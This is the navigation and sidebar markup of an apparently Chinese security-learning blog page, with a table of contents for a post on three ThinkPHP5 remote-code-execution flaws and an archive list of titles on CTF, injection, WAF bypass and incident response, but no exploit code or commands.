        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE1-%E5%88%A9%E7%94%A8%E7%BC%93%E5%AD%98%E6%96%87%E4%BB%B6GetShell%E4%BB%8E%E8%80%8CRCE"><span class="toc-number">1.</span> <span class="toc-text">RCE1(利用缓存文件GetShell从而RCE)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC"><span class="toc-number">1.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0"><span class="toc-number">1.2.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC"><span class="toc-number">1.3.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93"><span class="toc-number">1.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D"><span class="toc-number">1.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE2-%E5%88%A9%E7%94%A8%E4%BB%BB%E6%84%8F%E6%8E%A7%E5%88%B6%E5%99%A8%E8%B0%83%E7%94%A8RCE"><span class="toc-number">2.</span> <span class="toc-text">RCE2(利用任意控制器调用RCE)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-1"><span class="toc-number">2.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-1"><span class="toc-number">2.2.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-1"><span class="toc-number">2.3.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-1"><span class="toc-number">2.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-1"><span class="toc-number">2.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-1"><span class="toc-number">2.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#RCE3"><span class="toc-number">3.</span> <span class="toc-text">RCE3</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#POC-2"><span class="toc-number">3.1.</span> <span class="toc-text">POC</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E6%A6%82%E8%BF%B0-2"><span class="toc-number">3.2.</span> <span class="toc-text">漏洞概述</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%BD%B1%E5%93%8D%E7%89%88%E6%9C%AC-2"><span class="toc-number">3.3.</span> <span class="toc-text">影响版本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90-2"><span class="toc-number">3.4.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%A9%E7%94%A8%E6%80%BB%E7%BB%93-2"><span class="toc-number">3.5.</span> <span class="toc-text">利用总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E4%BF%AE%E5%A4%8D-2"><span class="toc-number">3.6.</span> <span class="toc-text">漏洞修复</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 22
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2020 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/23</span><a class="archive-post-title" href= "/a45.html" >ThinkPHP5漏洞学习-RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/22</span><a class="archive-post-title" href= "/5dcc.html" >CSS 注入学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/21</span><a class="archive-post-title" href= "/0.html" >《透视APT》读书笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/8d0f.html" >ThinkPHP5漏洞学习-文件包含漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/13</span><a class="archive-post-title" href= "/69fea760.html" >ThinkPHP5漏洞学习-SQL注入</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/12</span><a class="archive-post-title" href= "/844d1b07.html" >新秀企业网站系统代码审计学习(复现)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/11</span><a class="archive-post-title" href= "/4fd81e40.html" >MacOS 下配置PHP代码审计环境，PHP调试学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/11</span><a class="archive-post-title" href= "/66043e4c.html" >WAF Bypass 姿势总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/09</span><a class="archive-post-title" href= "/fb2051a0.html" >CTF-XSS</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/936f84c6.html" >CTF-SSTI</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/07</span><a class="archive-post-title" href= "/54449ea6.html" >Windows 服务器应急响应</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/04</span><a class="archive-post-title" href= "/e312198e.html" >Linux 服务器应急响应</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/03</span><a class="archive-post-title" href= "/7881c78e.html" >CTF - 文件包含</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span><a class="archive-post-title" href= "/dbb484a9.html" >CTF - RCE</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/30</span><a class="archive-post-title" href= "/103ec22a.html" >CTF - 文件上传</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/29</span><a class="archive-post-title" href= "/bc077bb7.html" >HTTP request smuggling(请求走私)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/27</span><a class="archive-post-title" href= "/a4738b93.html" >CTF Tricks 总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/13bb2df2.html" >iptables 学习</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/c10c5ca9.html" >Redis 安全学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/26</span><a class="archive-post-title" href= "/e42fccb.html" >常见端口服务漏洞</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/25</span><a class="archive-post-title" href= "/56cfbe5.html" >PHP CVE、ThinkPHP、PhpMyAdmin、PHP 安全学习笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/25</span><a class="archive-post-title" href= "/d8714939.html" >PHP以及MYSQL相关版本差异及对应的安全问</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="渗透测试"><span class="iconfont-archer">&#xe606;</span>渗透测试</span>
    
        <span class="sidebar-tag-name" data-tags="CTF"><span class="iconfont-archer">&#xe606;</span>CTF</span>
    
        <span class="sidebar-tag-name" data-tags="SSTI"><span class="iconfont-archer">&#xe606;</span>SSTI</span>
    
        <span class="sidebar-tag-name" data-tags="协议层安全"><span class="iconfont-archer">&#xe606;</span>协议层安全</span>
    
        <span class="sidebar-tag-name" data-tags="PHP安全"><span class="iconfont-archer">&#xe606;</span>PHP安全</span>
    
        <span class="sidebar-tag-name" data-tags="代码审计"><span class="iconfont-archer">&#xe606;</span>代码审计</span>
    
        <span class="sidebar-tag-name" data-tags="文件包含"><span class="iconfont-archer">&#xe606;</span>文件包含</span>
    
        <span class="sidebar-tag-name" data-tags="Linux应急响应"><span class="iconfont-archer">&#xe606;</span>Linux应急响应</span>
    
        <span class="sidebar-tag-name" data-tags="端口"><span class="iconfont-archer">&#xe606;</span>端口</span>
    
        <span class="sidebar-tag-name" data-tags="漏洞挖掘"><span class="iconfont-archer">&#xe606;</span>漏洞挖掘</span>
    
        <span class="sidebar-tag-name" data-tags="SQL注入"><span class="iconfont-archer">&#xe606;</span>SQL注入</span>
    
        <span class="sidebar-tag-name" data-tags="iptables"><span class="iconfont-archer">&#xe606;</span>iptables</span>
    
        <span class="sidebar-tag-name" data-tags="APT"><span class="iconfont-archer">&#xe606;</span>APT</span>
    
        <span class="sidebar-tag-name" data-tags="RCE"><span class="iconfont-archer">&#xe606;</span>RCE</span>
    
        <span class="sidebar-tag-name" data-tags="Redis"><span class="iconfont-archer">&#xe606;</span>Redis</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="CTF"><span class="iconfont-archer">&#xe60a;</span>CTF</span>
    
        <span class="sidebar-category-name" data-categories="渗透测试"><span class="iconfont-archer">&#xe60a;</span>渗透测试</span>
    
        <span class="sidebar-category-name" data-categories="运维知识"><span class="iconfont-archer">&#xe60a;</span>运维知识</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "m0nk3y"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    </body>
</html>


